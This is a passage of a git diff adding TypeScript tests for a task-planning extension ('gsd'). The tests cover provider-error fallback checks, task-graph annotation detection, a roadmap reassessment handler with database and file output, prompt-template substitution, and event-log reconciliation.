+      `model fallback condition must include cls.kind === "${kind}"`,
+    );
+  }
+});
+
+test("permanent errors still bypass model fallback and pause indefinitely", () => {
+  const src = getRecoverySource();
+
+  // The permanent/unknown error handler must exist and call pauseAutoForProviderError
+  // with isTransient: false.
+  const permanentPauseRe = /pauseAutoForProviderError[\s\S]{0,300}isTransient:\s*false/;
+  assert.ok(
+    permanentPauseRe.test(src),
+    'permanent errors must pause with isTransient: false (no auto-resume)',
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/reactive-executor.test.ts b/src/resources/extensions/gsd/tests/reactive-executor.test.ts
index 458cc1bc5..500316f06 100644
--- a/src/resources/extensions/gsd/tests/reactive-executor.test.ts
+++ b/src/resources/extensions/gsd/tests/reactive-executor.test.ts
@@ -15,6 +15,7 @@ import {
 } from "../reactive-graph.ts";
 import { validatePreferences } from "../preferences-validation.ts";
 import type { ReactiveExecutionState } from "../types.ts";
+import { parseUnitId } from "../unit-id.ts";
 
 // ─── Preference Validation ────────────────────────────────────────────────
 
@@ -441,13 +442,12 @@ test("unitId batch encoding round-trips correctly", () => {
   const unitId = `${mid}/${sid}/reactive+${selected.join(",")}`;
 
   // Parse it back
-  const parts = unitId.split("/");
-  assert.equal(parts[0], "M001");
-  assert.equal(parts[1], "S01");
-  const batchPart = parts[2];
-  const plusIdx = batchPart.indexOf("+");
+  const { milestone, slice, task: batchPart } = parseUnitId(unitId);
+  assert.equal(milestone, "M001");
+  assert.equal(slice, "S01");
+  const plusIdx = batchPart!.indexOf("+");
   assert.ok(plusIdx > 0, "Should have + separator");
-  const batchIds = batchPart.slice(plusIdx + 1).split(",");
+  const batchIds = batchPart!.slice(plusIdx + 1).split(",");
   assert.deepEqual(batchIds, ["T02", "T03", "T05"]);
 });
 
diff --git a/src/resources/extensions/gsd/tests/reactive-graph.test.ts b/src/resources/extensions/gsd/tests/reactive-graph.test.ts
index 4cf077056..6232dc6b0 100644
--- a/src/resources/extensions/gsd/tests/reactive-graph.test.ts
+++ b/src/resources/extensions/gsd/tests/reactive-graph.test.ts
@@ -5,6 +5,7 @@ import {
   getReadyTasks,
   chooseNonConflictingSubset,
   isGraphAmbiguous,
+  getMissingAnnotationTasks,
   detectDeadlock,
   graphMetrics,
 } from "../reactive-graph.ts";
@@ -100,6 +101,25 @@ test("parseTaskPlanIO handles multiple backtick tokens on one line", () => {
   assert.deepEqual(io.outputFiles, ["src/c.ts"]);
 });
 
+test("parseTaskPlanIO strips inline descriptions from backtick-wrapped file references", () => {
+  const content = `# T01: Described Paths
+
+## Inputs
+
+- \`src/config.ts — existing configuration\`
+- \`src/flags.ts - feature flags\`
+
+## Expected Output
+
+- \`definitions/ac-audit.md — current state of AC CRM\`
+- \`docs/runbook.md - update deployment notes\`
+`;
+
+  const io = parseTaskPlanIO(content);
+  assert.deepEqual(io.inputFiles, ["src/config.ts", "src/flags.ts"]);
+  assert.deepEqual(io.outputFiles, ["definitions/ac-audit.md", "docs/runbook.md"]);
+});
+
 // ─── deriveTaskGraph ──────────────────────────────────────────────────────
 
 test("deriveTaskGraph: linear chain T01→T02→T03", () => {
@@ -297,3 +317,47 @@ test("graphMetrics computes correct values", () => {
   assert.equal(metrics.readySetSize, 2); // T02 (T01 done) and T03 (no deps)
   assert.equal(metrics.ambiguous, false);
 });
+
+// ─── getMissingAnnotationTasks ─────────────────────────────────────────────
+
+test("getMissingAnnotationTasks: returns empty array when all tasks have annotations", () => {
+  const graph: DerivedTaskNode[] = [
+    { id: "T01", title: "A", inputFiles: ["src/a.ts"], outputFiles: ["src/b.ts"], done: false, dependsOn: [] },
+    { id: "T02", title: "B", inputFiles: [], outputFiles: ["src/c.ts"], done: false, dependsOn: [] },
+  ];
+  assert.deepEqual(getMissingAnnotationTasks(graph), []);
+});
+
+test("getMissingAnnotationTasks: returns tasks with missing annotations", () => {
+  const graph: DerivedTaskNode[] = [
+    { id: "T01", title: "A", inputFiles: [], outputFiles: [], done: false, dependsOn: [] },
+    { id: "T02", title: "B", inputFiles: ["src/a.ts"], outputFiles: ["src/b.ts"], done: false, dependsOn: [] },
+    { id: "T03", title: "C", inputFiles: [], outputFiles: [], done: false, dependsOn: [] },
+  ];
+  assert.deepEqual(getMissingAnnotationTasks(graph), [
+    { id: "T01", title: "A" },
+    { id: "T03", title: "C" },
+  ]);
+});
+
+test("getMissingAnnotationTasks: skips done tasks", () => {
+  const graph: DerivedTaskNode[] = [
+    { id: "T01", title: "A", inputFiles: [], outputFiles: [], done: true, dependsOn: [] },
+    { id: "T02", title: "B", inputFiles: [], outputFiles: [], done: false, dependsOn: [] },
+  ];
+  assert.deepEqual(getMissingAnnotationTasks(graph), [
+    { id: "T02", title: "B" },
+  ]);
+});
+
+test("getMissingAnnotationTasks: returns only tasks missing BOTH inputFiles and outputFiles", () => {
+  const graph: DerivedTaskNode[] = [
+    { id: "T01", title: "InputOnly", inputFiles: ["src/a.ts"], outputFiles: [], done: false, dependsOn: [] },
+    { id: "T02", title: "OutputOnly", inputFiles: [], outputFiles: ["src/b.ts"], done: false, dependsOn: [] },
+    { id: "T03", title: "Neither", inputFiles: [], outputFiles: [], done: false, dependsOn: [] },
+    { id: "T04", title: "Both", inputFiles: ["src/c.ts"], outputFiles: ["src/d.ts"], done: false, dependsOn: [] },
+  ];
+  assert.deepEqual(getMissingAnnotationTasks(graph), [
+    { id: "T03", title: "Neither" },
+  ]);
+});
diff --git a/src/resources/extensions/gsd/tests/reassess-handler.test.ts b/src/resources/extensions/gsd/tests/reassess-handler.test.ts
new file mode 100644
index 000000000..2f8e2aa36
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/reassess-handler.test.ts
@@ -0,0 +1,442 @@
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, rmSync, existsSync, readFileSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertAssessment,
+  getSlice,
+  getMilestoneSlices,
+  getAssessment,
+  _getAdapter,
+} from '../gsd-db.ts';
+import { handleReassessRoadmap } from '../tools/reassess-roadmap.ts';
+
+function makeTmpBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-reassess-'));
+  mkdirSync(join(base, '.gsd', 'milestones', 'M001', 'slices', 'S01'), { recursive: true });
+  mkdirSync(join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02'), { recursive: true });
+  mkdirSync(join(base, '.gsd', 'milestones', 'M001', 'slices', 'S03'), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  try { closeDatabase(); } catch { /* noop */ }
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* noop */ }
+}
+
+function seedMilestoneWithSlices(opts?: {
+  s01Status?: string;
+  s02Status?: string;
+  s03Status?: string;
+}): void {
+  insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice One', status: opts?.s01Status ?? 'complete', demo: 'Demo one.' });
+  insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Slice Two', status: opts?.s02Status ?? 'pending', demo: 'Demo two.' });
+  insertSlice({ id: 'S03', milestoneId: 'M001', title: 'Slice Three', status: opts?.s03Status ?? 'pending', demo: 'Demo three.' });
+}
+
+function validReassessParams() {
+  return {
+    milestoneId: 'M001',
+    completedSliceId: 'S01',
+    verdict: 'confirmed',
+    assessment: 'S01 completed successfully. Roadmap is on track.',
+    sliceChanges: {
+      modified: [
+        {
+          sliceId: 'S02',
+          title: 'Updated Slice Two',
+          risk: 'high',
+          depends: ['S01'],
+          demo: 'Updated demo two.',
+        },
+      ],
+      added: [
+        {
+          sliceId: 'S04',
+          title: 'New Slice Four',
+          risk: 'low',
+          depends: ['S02'],
+          demo: 'Demo four.',
+        },
+      ],
+      removed: ['S03'],
+    },
+  };
+}
+
+// ─── Tests ────────────────────────────────────────────────────────────────
+
+test('handleReassessRoadmap rejects invalid payloads (missing milestoneId)', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedMilestoneWithSlices();
+    const result = await handleReassessRoadmap({ ...validReassessParams(), milestoneId: '' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /validation failed/);
+    assert.match(result.error, /milestoneId/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReassessRoadmap rejects missing milestone', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    // No milestone seeded
+    const result = await handleReassessRoadmap(validReassessParams(), base);
+    assert.ok('error' in result);
+    assert.match(result.error, /not found/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReassessRoadmap rejects structural violation: modifying a completed slice', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedMilestoneWithSlices({ s01Status: 'complete', s02Status: 'pending', s03Status: 'pending' });
+
+    const result = await handleReassessRoadmap({
+      ...validReassessParams(),
+      sliceChanges: {
+        modified: [{ sliceId: 'S01', title: 'Trying to modify completed S01' }],
+        added: [],
+        removed: [],
+      },
+    }, base);
+
+    assert.ok('error' in result);
+    assert.match(result.error, /completed slice/);
+    assert.match(result.error, /S01/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReassessRoadmap rejects structural violation: removing a completed slice', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedMilestoneWithSlices({ s01Status: 'complete', s02Status: 'pending', s03Status: 'pending' });
+
+    const result = await handleReassessRoadmap({
+      ...validReassessParams(),
+      sliceChanges: {
+        modified: [],
+        added: [],
+        removed: ['S01'],
+      },
+    }, base);
+
+    assert.ok('error' in result);
+    assert.match(result.error, /completed slice/);
+    assert.match(result.error, /S01/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReassessRoadmap succeeds when modifying only pending slices', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedMilestoneWithSlices({ s01Status: 'complete', s02Status: 'pending', s03Status: 'pending' });
+
+    const params = validReassessParams();
+    const result = await handleReassessRoadmap(params, base);
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+
+    // Verify assessments row exists in DB
+    const assessmentPath = join('.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-ASSESSMENT.md');
+    const assessment = getAssessment(assessmentPath);
+    assert.ok(assessment, 'assessment row should exist in DB');
+    assert.equal(assessment['milestone_id'], 'M001');
+    assert.equal(assessment['status'], 'confirmed');
+    assert.equal(assessment['scope'], 'roadmap');
+    assert.ok((assessment['full_content'] as string).includes('S01 completed successfully'), 'assessment content should be stored');
+
+    // Verify S02 was updated
+    const s02 = getSlice('M001', 'S02');
+    assert.ok(s02, 'S02 should still exist');
+    assert.equal(s02?.title, 'Updated Slice Two');
+    assert.equal(s02?.risk, 'high');
+    assert.equal(s02?.demo, 'Updated demo two.');
+
+    // Verify S03 was deleted
+    const s03 = getSlice('M001', 'S03');
+    assert.equal(s03, null, 'S03 should have been deleted');
+
+    // Verify S04 was inserted
+    const s04 = getSlice('M001', 'S04');
+    assert.ok(s04, 'S04 should exist as a new slice');
+    assert.equal(s04?.title, 'New Slice Four');
+    assert.equal(s04?.status, 'pending');
+
+    // Verify S01 (completed) was NOT touched
+    const s01 = getSlice('M001', 'S01');
+    assert.ok(s01, 'S01 should still exist');
+    assert.equal(s01?.status, 'complete');
+
+    // Verify ROADMAP.md re-rendered on disk
+    const roadmapPath = join(base, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md');
+    assert.ok(existsSync(roadmapPath), 'ROADMAP.md should be rendered to disk');
+    const roadmapContent = readFileSync(roadmapPath, 'utf-8');
+    assert.ok(roadmapContent.includes('Updated Slice Two'), 'ROADMAP.md should contain updated S02 title');
+
+    // Verify ASSESSMENT.md exists on disk
+    const assessmentDiskPath = join(base, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-ASSESSMENT.md');
+    assert.ok(existsSync(assessmentDiskPath), 'ASSESSMENT.md should be rendered to disk');
+    const assessmentContent = readFileSync(assessmentDiskPath, 'utf-8');
+    assert.ok(assessmentContent.includes('confirmed'), 'ASSESSMENT.md should contain verdict');
+    assert.ok(assessmentContent.includes('S01'), 'ASSESSMENT.md should reference completed slice');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReassessRoadmap cache invalidation: getMilestoneSlices reflects mutations', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedMilestoneWithSlices({ s01Status: 'complete', s02Status: 'pending', s03Status: 'pending' });
+
+    const params = validReassessParams();
+    const result = await handleReassessRoadmap(params, base);
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+
+    // After cache invalidation, DB queries should reflect mutations
+    const slices = getMilestoneSlices('M001');
+    const sliceIds = slices.map(s => s.id);
+
+    // S01 should remain (completed, untouched)
+    assert.ok(sliceIds.includes('S01'), 'S01 should still exist after reassess');
+
+    // S02 should remain (modified, not removed)
+    assert.ok(sliceIds.includes('S02'), 'S02 should still exist after reassess');
+
+    // S03 should be gone (removed)
+    assert.ok(!sliceIds.includes('S03'), 'S03 should be gone after removal');
+
+    // S04 should exist (added)
+    assert.ok(sliceIds.includes('S04'), 'S04 should exist after addition');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReassessRoadmap is idempotent: calling twice with same params succeeds', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedMilestoneWithSlices({ s01Status: 'complete', s02Status: 'pending', s03Status: 'pending' });
+
+    // First call with full mutations
+    const params = validReassessParams();
+    const first = await handleReassessRoadmap(params, base);
+    assert.ok(!('error' in first), `first call error: ${'error' in first ? first.error : ''}`);
+
+    // Second call — S03 already deleted, S04 already exists (INSERT OR IGNORE), S02 already updated
+    // This should still succeed because:
+    // - assessments uses INSERT OR REPLACE (path PK)
+    // - S04 insert uses INSERT OR IGNORE
+    // - S02 update is idempotent
+    // - S03 delete on nonexistent is a no-op
+    const second = await handleReassessRoadmap(params, base);
+    assert.ok(!('error' in second), `second call error: ${'error' in second ? second.error : ''}`);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReassessRoadmap rejects slice with status "done" (alias for complete)', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedMilestoneWithSlices({ s01Status: 'done', s02Status: 'pending', s03Status: 'pending' });
+
+    const result = await handleReassessRoadmap({
+      ...validReassessParams(),
+      sliceChanges: {
+        modified: [{ sliceId: 'S01', title: 'Trying to modify done S01' }],
+        added: [],
+        removed: [],
+      },
+    }, base);
+
+    assert.ok('error' in result);
+    assert.match(result.error, /completed slice/);
+    assert.match(result.error, /S01/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReassessRoadmap returns structured error payloads with actionable messages', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedMilestoneWithSlices({ s01Status: 'complete', s02Status: 'complete', s03Status: 'pending' });
+
+    // Try to modify S01 (completed)
+    const modifyResult = await handleReassessRoadmap({
+      ...validReassessParams(),
+      sliceChanges: {
+        modified: [{ sliceId: 'S01', title: 'x' }],
+        added: [],
+        removed: [],
+      },
+    }, base);
+    assert.ok('error' in modifyResult);
+    assert.ok(typeof modifyResult.error === 'string', 'error should be a string');
+    assert.ok(modifyResult.error.includes('S01'), 'error should name the specific slice ID S01');
+
+    // Try to remove S02 (completed)
+    const removeResult = await handleReassessRoadmap({
+      ...validReassessParams(),
+      sliceChanges: {
+        modified: [],
+        added: [],
+        removed: ['S02'],
+      },
+    }, base);
+    assert.ok('error' in removeResult);
+    assert.ok(removeResult.error.includes('S02'), 'error should name the specific slice ID S02');
+  } finally {
+    cleanup(base);
+  }
+});
+
+// ─── Bug #2957: Stale VALIDATION survives roadmap remediation ────────────
+
+test('handleReassessRoadmap invalidates stale milestone-validation when roadmap changes (#2957)', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    // Seed: M001 with S01-S04 all complete, plus a stale VALIDATION with needs-remediation
+    insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice One', status: 'complete', demo: 'Demo' });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Slice Two', status: 'complete', demo: 'Demo' });
+    insertSlice({ id: 'S03', milestoneId: 'M001', title: 'Slice Three', status: 'complete', demo: 'Demo' });
+    insertSlice({ id: 'S04', milestoneId: 'M001', title: 'Slice Four', status: 'complete', demo: 'Demo' });
+
+    // Insert milestone-validation assessment with needs-remediation verdict (stale)
+    const validationPath = join('.gsd', 'milestones', 'M001', 'M001-VALIDATION.md');
+    insertAssessment({
+      path: validationPath,
+      milestoneId: 'M001',
+      sliceId: null,
+      taskId: null,
+      status: 'needs-remediation',
+      scope: 'milestone-validation',
+      fullContent: '---\nverdict: needs-remediation\nremediation_round: 0\n---\n\n# Validation\nNeeds remediation.',
+    });
+
+    // Verify the validation row exists before reassess
+    const adapter = _getAdapter()!;
+    const before = adapter.prepare(
+      `SELECT * FROM assessments WHERE milestone_id = 'M001' AND scope = 'milestone-validation'`,
+    ).get() as Record<string, unknown> | undefined;
+    assert.ok(before, 'milestone-validation row should exist before reassess');
+
+    // Now reassess the roadmap: add remediation slice S05
+    // This simulates the scenario from #2957 where validation produced needs-remediation
+    // and then roadmap was reassessed to add a remediation slice
+    const result = await handleReassessRoadmap({
+      milestoneId: 'M001',
+      completedSliceId: 'S04',
+      verdict: 'on-track',
+      assessment: 'S04 completed. Adding remediation slice S05.',
+      sliceChanges: {
+        modified: [],
+        added: [
+          {
+            sliceId: 'S05',
+            title: 'Remediation Slice',
+            risk: 'low',
+            depends: ['S04'],
+            demo: 'Fix the issues found during validation.',
+          },
+        ],
+        removed: [],
+      },
+    }, base);
+
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+
+    // The stale milestone-validation row must be deleted after roadmap changes
+    const after = adapter.prepare(
+      `SELECT * FROM assessments WHERE milestone_id = 'M001' AND scope = 'milestone-validation'`,
+    ).get() as Record<string, unknown> | undefined;
+    assert.equal(after, undefined, 'milestone-validation row should be deleted after roadmap changes — stale validation must not survive remediation (#2957)');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handleReassessRoadmap does NOT invalidate validation when no roadmap structural changes (#2957)', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    // Seed: M001 with slices, plus a validation with pass verdict
+    insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice One', status: 'complete', demo: 'Demo' });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Slice Two', status: 'pending', demo: 'Demo' });
+
+    // Insert milestone-validation assessment with pass verdict
+    const validationPath = join('.gsd', 'milestones', 'M001', 'M001-VALIDATION.md');
+    insertAssessment({
+      path: validationPath,
+      milestoneId: 'M001',
+      sliceId: null,
+      taskId: null,
+      status: 'pass',
+      scope: 'milestone-validation',
+      fullContent: '---\nverdict: pass\nremediation_round: 0\n---\n\n# Validation\nAll good.',
+    });
+
+    // Reassess with no structural changes (empty added/modified/removed)
+    const result = await handleReassessRoadmap({
+      milestoneId: 'M001',
+      completedSliceId: 'S01',
+      verdict: 'confirmed',
+      assessment: 'S01 completed. No changes needed.',
+      sliceChanges: {
+        modified: [],
+        added: [],
+        removed: [],
+      },
+    }, base);
+
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+
+    // Validation should still exist when no structural changes occurred
+    const adapter = _getAdapter()!;
+    const row = adapter.prepare(
+      `SELECT * FROM assessments WHERE milestone_id = 'M001' AND scope = 'milestone-validation'`,
+    ).get() as Record<string, unknown> | undefined;
+    assert.ok(row, 'milestone-validation row should survive when no structural changes occurred');
+  } finally {
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/reassess-prompt.test.ts b/src/resources/extensions/gsd/tests/reassess-prompt.test.ts
index 2f34f6311..d0db26f23 100644
--- a/src/resources/extensions/gsd/tests/reassess-prompt.test.ts
+++ b/src/resources/extensions/gsd/tests/reassess-prompt.test.ts
@@ -1,15 +1,14 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { readFileSync } from "node:fs";
 import { join, dirname } from "node:path";
 import { fileURLToPath } from "node:url";
-import { createTestContext } from './test-helpers.ts';
-
 // loadPrompt reads from ~/.gsd/agent/extensions/gsd/prompts/ (main checkout).
 // In a worktree the file may not exist there yet, so we resolve prompts
 // relative to this test file's location (the worktree copy).
 const __dirname = dirname(fileURLToPath(import.meta.url));
 const worktreePromptsDir = join(__dirname, "..", "prompts");
 
-const { assertTrue, report } = createTestContext();
 /**
  * Load a prompt template from the worktree prompts directory
  * and apply variable substitution (mirrors loadPrompt logic).
@@ -27,11 +26,10 @@ function loadPromptFromWorktree(name: string, vars: Record<string, string> = {})
 // Tests
 // ═══════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
-
   // ─── reassess-roadmap prompt loads and substitutes ─────────────────────
-  console.log("\n=== reassess-roadmap prompt loads and substitutes ===");
-  {
+
+describe('reassess-prompt', () => {
+test('reassess-roadmap prompt loads and substitutes', () => {
     const testVars = {
       workingDirectory: "/tmp/test-project",
       milestoneId: "M099",
@@ -51,27 +49,26 @@ async function main(): Promise<void> {
       console.error(`  ERROR: loadPrompt threw: ${err}`);
     }
 
-    assertTrue(!threw, "loadPrompt does not throw for reassess-roadmap");
-    assertTrue(typeof result === "string" && result.length > 0, "loadPrompt returns a non-empty string");
+    assert.ok(!threw, "loadPrompt does not throw for reassess-roadmap");
+    assert.ok(typeof result === "string" && result.length > 0, "loadPrompt returns a non-empty string");
 
     // Verify all test variables were substituted into the output
-    assertTrue(result.includes("M099"), "prompt contains milestoneId 'M099'");
-    assertTrue(result.includes("S03"), "prompt contains completedSliceId 'S03'");
-    assertTrue(result.includes(".gsd/milestones/M099/slices/S03/S03-ASSESSMENT.md"), "prompt contains assessmentPath");
-    assertTrue(result.includes(".gsd/milestones/M099/M099-ROADMAP.md"), "prompt contains roadmapPath");
-    assertTrue(result.includes("--- test inlined context block ---"), "prompt contains inlinedContext");
+    assert.ok(result.includes("M099"), "prompt contains milestoneId 'M099'");
+    assert.ok(result.includes("S03"), "prompt contains completedSliceId 'S03'");
+    assert.ok(result.includes(".gsd/milestones/M099/slices/S03/S03-ASSESSMENT.md"), "prompt contains assessmentPath");
+    assert.ok(result.includes(".gsd/milestones/M099/M099-ROADMAP.md"), "prompt contains roadmapPath");
+    assert.ok(result.includes("--- test inlined context block ---"), "prompt contains inlinedContext");
 
     // Verify no un-substituted variables remain
-    assertTrue(!result.includes("{{milestoneId}}"), "no un-substituted {{milestoneId}}");
-    assertTrue(!result.includes("{{completedSliceId}}"), "no un-substituted {{completedSliceId}}");
-    assertTrue(!result.includes("{{assessmentPath}}"), "no un-substituted {{assessmentPath}}");
-    assertTrue(!result.includes("{{roadmapPath}}"), "no un-substituted {{roadmapPath}}");
-    assertTrue(!result.includes("{{inlinedContext}}"), "no un-substituted {{inlinedContext}}");
-  }
+    assert.ok(!result.includes("{{milestoneId}}"), "no un-substituted {{milestoneId}}");
+    assert.ok(!result.includes("{{completedSliceId}}"), "no un-substituted {{completedSliceId}}");
+    assert.ok(!result.includes("{{assessmentPath}}"), "no un-substituted {{assessmentPath}}");
+    assert.ok(!result.includes("{{roadmapPath}}"), "no un-substituted {{roadmapPath}}");
+    assert.ok(!result.includes("{{inlinedContext}}"), "no un-substituted {{inlinedContext}}");
+});
 
   // ─── reassess-roadmap contains coverage-check instruction ─────────────
-  console.log("\n=== reassess-roadmap contains coverage-check instruction ===");
-  {
+test('reassess-roadmap contains coverage-check instruction', () => {
     const prompt = loadPromptFromWorktree("reassess-roadmap", {
       workingDirectory: "/tmp/test-project",
       milestoneId: "M001",
@@ -85,33 +82,32 @@ async function main(): Promise<void> {
     const lower = prompt.toLowerCase();
 
     // The prompt must mention "each success criterion" or "every success criterion"
-    assertTrue(
+    assert.ok(
       lower.includes("each success criterion") || lower.includes("every success criterion"),
       "prompt contains 'each success criterion' or 'every success criterion'"
     );
 
     // The prompt must mention "owning slice" or "remaining slice"
-    assertTrue(
+    assert.ok(
       lower.includes("owning slice") || lower.includes("remaining slice"),
       "prompt contains 'owning slice' or 'remaining slice'"
     );
 
     // The prompt must mention "no remaining owner" or "no owner" or "no slice"
-    assertTrue(
+    assert.ok(
       lower.includes("no remaining owner") || lower.includes("no owner") || lower.includes("no slice"),
       "prompt contains 'no remaining owner', 'no owner', or 'no slice'"
     );
 
     // The prompt must mention "blocking issue" or "blocking"
-    assertTrue(
+    assert.ok(
       lower.includes("blocking issue") || lower.includes("blocking"),
       "prompt contains 'blocking issue' or 'blocking'"
     );
-  }
+});
 
   // ─── coverage-check requires at-least-one semantics ───────────────────
-  console.log("\n=== coverage-check requires at-least-one semantics ===");
-  {
+test('coverage-check requires at-least-one semantics', () => {
     const prompt = loadPromptFromWorktree("reassess-roadmap", {
       workingDirectory: "/tmp/test-project",
       milestoneId: "M001",
@@ -124,22 +120,16 @@ async function main(): Promise<void> {
     const lower = prompt.toLowerCase();
 
     // The instruction must use "at least one" or equivalent inclusive language
-    assertTrue(
+    assert.ok(
       lower.includes("at least one") || lower.includes("at-least-one") || lower.includes("one or more"),
       "prompt uses 'at least one' or equivalent inclusive language for slice ownership"
     );
 
     // The instruction must NOT require "exactly one" — that would be too rigid
-    assertTrue(
+    assert.ok(
       !lower.includes("exactly one owner") && !lower.includes("exactly one slice"),
       "prompt does NOT use 'exactly one' for slice ownership (would be too rigid)"
     );
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+});
+
 });
diff --git a/src/resources/extensions/gsd/tests/reconciliation-edge-cases.test.ts b/src/resources/extensions/gsd/tests/reconciliation-edge-cases.test.ts
new file mode 100644
index 000000000..0413859b6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/reconciliation-edge-cases.test.ts
@@ -0,0 +1,162 @@
+// GSD State Machine Regression Tests — Event Replay & Reconciliation (#3161)
+
+import { describe, test, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { createHash } from "node:crypto";
+import * as fs from "node:fs";
+import * as path from "node:path";
+import * as os from "node:os";
+import { findForkPoint, readEvents, appendEvent } from "../workflow-events.ts";
+import type { WorkflowEvent } from "../workflow-events.ts";
+import { extractEntityKey, detectConflicts } from "../workflow-reconcile.ts";
+
+// ─── Helper: build a full WorkflowEvent from cmd + params ────────────────────
+
+function makeEvent(cmd: string, params: Record<string, unknown>, ts?: string): WorkflowEvent {
+  const hash = createHash("sha256")
+    .update(JSON.stringify({ cmd, params }))
+    .digest("hex")
+    .slice(0, 16);
+  return { cmd, params, ts: ts ?? new Date().toISOString(), hash, actor: "agent", session_id: "test-session" };
+}
+
+// ─── Temp dir management ─────────────────────────────────────────────────────
+
+const tempDirs: string[] = [];
+
+function tempDir(): string {
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "gsd-recon-test-"));
+  tempDirs.push(dir);
+  return dir;
+}
+
+afterEach(() => {
+  for (const dir of tempDirs.splice(0)) {
+    try { fs.rmSync(dir, { recursive: true, force: true }); } catch { /* best effort */ }
+  }
+});
+
+// ─── Tests ────────────────────────────────────────────────────────────────────
+
+describe("reconciliation-edge-cases", () => {
+
+  // findForkPoint
+  test("findForkPoint returns -1 for completely diverged logs", () => {
+    const eA = makeEvent("complete_task", { milestoneId: "M001", sliceId: "S01", taskId: "T01" });
+    const eB = makeEvent("complete_task", { milestoneId: "M001", sliceId: "S01", taskId: "T02" });
+
+    const logA: WorkflowEvent[] = [eA];
+    const logB: WorkflowEvent[] = [eB];
+
+    assert.equal(findForkPoint(logA, logB), -1, "completely diverged logs should return -1");
+  });
+
+  test("findForkPoint returns last index when one log is prefix of another", () => {
+    const e1 = makeEvent("start_task", { milestoneId: "M001", sliceId: "S01", taskId: "T01" });
+    const e2 = makeEvent("complete_task", { milestoneId: "M001", sliceId: "S01", taskId: "T01" });
+    const e3 = makeEvent("complete_slice", { milestoneId: "M001", sliceId: "S01" });
+
+    const logA: WorkflowEvent[] = [e1, e2];
+    const logB: WorkflowEvent[] = [e1, e2, e3];
+
+    assert.equal(findForkPoint(logA, logB), 1, "prefix log should fork at last shared index");
+  });
+
+  test("findForkPoint returns -1 for empty logs", () => {
+    assert.equal(findForkPoint([], []), -1, "two empty logs should return -1");
+  });
+
+  // extractEntityKey
+  test("extractEntityKey returns null for malformed events (missing taskId)", () => {
+    const event = makeEvent("complete_task", {});
+    // params has no taskId — should return null rather than return a bad key
+    assert.equal(extractEntityKey(event), null, "missing taskId should yield null entity key");
+  });
+
+  test("extractEntityKey returns null for unknown commands", () => {
+    const event = makeEvent("future_cmd", { foo: "bar" });
+    assert.equal(extractEntityKey(event), null, "unknown command should yield null entity key");
+  });
+
+  test("plan_slice and complete_slice use different entity types", () => {
+    const planEvent = makeEvent("plan_slice", { sliceId: "S01" });
+    const completeEvent = makeEvent("complete_slice", { sliceId: "S01" });
+
+    const planKey = extractEntityKey(planEvent);
+    const completeKey = extractEntityKey(completeEvent);
+
+    assert.ok(planKey !== null, "plan_slice should produce an entity key");
